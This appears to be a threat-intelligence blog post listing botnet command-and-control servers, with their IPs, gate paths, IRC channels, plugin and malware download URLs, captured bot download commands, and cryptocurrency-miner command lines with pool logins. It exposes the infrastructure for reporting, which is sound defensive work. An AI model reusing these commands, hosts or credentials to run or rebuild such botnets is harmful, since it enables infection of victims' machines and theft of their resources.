Server: imgay.ddos.es
Gate file: /h/order.php
Alternate domains: imgay.ddos.cat imgay.theswat.net
ddos.cat has been linked to botnets before.
Hosting infos:
;; QUESTION SECTION:
;imgay.ddos.es. IN A
;; ANSWER SECTION:
imgay.ddos.es. 149 IN A 94.27.87.58
imgay.ddos.es. 149 IN A 98.195.89.225
imgay.ddos.es. 149 IN A 174.112.126.155
imgay.ddos.es. 149 IN A 176.40.77.176
imgay.ddos.es. 149 IN A 178.150.207.252
imgay.ddos.es. 149 IN

wrightfeldhusen.info (Betabot http botnet hosted by staminus.net)
Resolved wrightfeldhusen.info to 69.197.35.109
Server: wrightfeldhusen.info
Gate file: /beta/order.php
Alternate domains: akwebdesigner.info websachee.info tincorporated.info thetwenty.info swedishseasons.info lommebags.info andywilsonfs.info ghostgames1.info futureofwebdesign.info vdezignstudio.info waterworks2.info waterworks2.com nordkupp1.info circusbum.info novflex.info
This is hosted on the same server as this Andromeda bot.
Hosting infos: http://whois.domaintools.com/69.197.35.109

fuckencio.com (Betabot http botnet hosted by offshoreracks.com)
Resolved fuckencio.com to 190.14.38.133
Server: fuckencio.com
Gate file: /wordpress/order.php
Alternate domains: clarocontigosiempre.mobi clarocontigosiempre.us
Hosting infos: http://whois.domaintools.com/190.14.38.133

www.panel-gc.co.uk (Andromeda http botnet hosted by staminus.net)
Resolved www.panel-gc.co.uk to 69.197.35.109
Server: www.panel-gc.co.uk
Gate file: /panel/gate.php
Plugins:
hxxp://www.panel-gc.co.uk/panel/fg_00eaffaa.mod
hxxp://www.panel-gc.co.uk/panel/rk_242fc383.mod
hxxp://www.panel-gc.co.uk/panel/s4_1829dbd8.mod
This is Andromeda 2.7, not the older cracked version.
Bitcoin mining info: -o http://us1.eclipsemc.com:8337 -u Jackpont_1 -p gizmooclad971 -k diablo
Hosting infos: http://whois.domaintools.com/69.197.35.109

srv5.su (snk asper mod irc botnet hosted by softronics.ch)
Resolved srv5.su to 94.242.198.64
Server: srv5.su
Port: 5050
Channel: #ok
#ok :.j #spr .j #lock .j #spam
#ok :.d p /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/114/105/119/81/50/105/98/117/
Downloads hxxp://94.242.198.64/4/smart.exe
Channel: #spr
#spr :.d x /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/111/122/100/11/121/116/127/
Downloads hxxp://94.242.198.64/4/spra.exe
Channel: #lock
#lock :.d l /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/96/112/107/110/11/121/116/127/
Downloads hxxp://94.242.198.64/4/lock.exe (winlocker)
Channel: #spam
#spam :.s.a /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/111/119/109/102/78/50/105/98/117/ /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/57/48/ 49 meeisodf
Alternate domain: srv50.su
Hosting infos: http://whois.domaintools.com/94.242.198.64

strike-digital.info (Fenix irc botnet hosted by santrex.net)
Resolved strike-digital.info to 46.166.184.109
Server: strike-digital.info
Port: 8888
Channel: #Fenix
Channel password: nxnxnx
A betabot belonging to the same guy is hosted on the same IP.
Hosting infos: http://whois.domaintools.com/46.166.184.109

guard4you.info (Betabot http botnet hosted by ecatel.net)
Resolved guard4you.info to 80.82.66.26
Server: guard4you.info
Gate file: /customer/order.php
Alternate domains: nexusguardian.info vote4us.info meet2n8.info
This is the same idiot as this previous betabot. After three of the free domains he used were suspended due to reports (lol), he decided to try again with paid domains. He’s upgraded to four .info domains registered at Namecheap, probably all

208.89.209.54 (Irc botnet hosted by virpus.com)
Server: 208.89.209.54
Port: 6667
Current global users 77, max 695
Channels:
#goon 3
#aryan 39
#OFFLINE#flood 1
##yBz## 15
##Offline## 19
Aryan bots:
Channel: #aryan
Topic for #aryan is: #OFFLINE
Topic for #aryan set by formality at Sun May 05 16:23:03 2013
Linux bots:
Channel: ##Offline##
Channel: ##yBz##
Hosting infos: http://whois.domaintools.com/208.89.209.54

betabros.in (Several http botnets hosted by hostkey.ru)
Resolved betabros.in to 146.0.78.4
Server: betabros.in
Gate file: /beta/order.php
The owner should keep a closer eye on the fake forum he set up for cover. 1071 pages of pharmacy spam and counting.
Hosting infos: http://whois.domaintools.com/146.0.78.4
EDIT: Bitcoin and litecoin mining.
macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x
shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p x

jkdef8.ws (Betabot http botnet hosted by ecatel.net)
Resolved jkdef8.ws to 94.102.51.117
Server: jkdef8.ws
Gate file: /papka/order.php
Alternate domains (currently unregistered): jkdef6.ws jkdef7.ws jkdef10.ws jkdef11.ws jkdef12.ws jkdef13.ws jkdef14.ws jkdef15.ws jkdef16.ws jkdef17.ws jkdef18.ws jkdef19.ws jkdef20.ws jkdef21.ws jkdef22.ws
Bitcoin mining info: http://pooledbits.com:8337 -u nigfinity.1 -p x
Hosting infos: http://whois.domaintools.com/94.102.51.117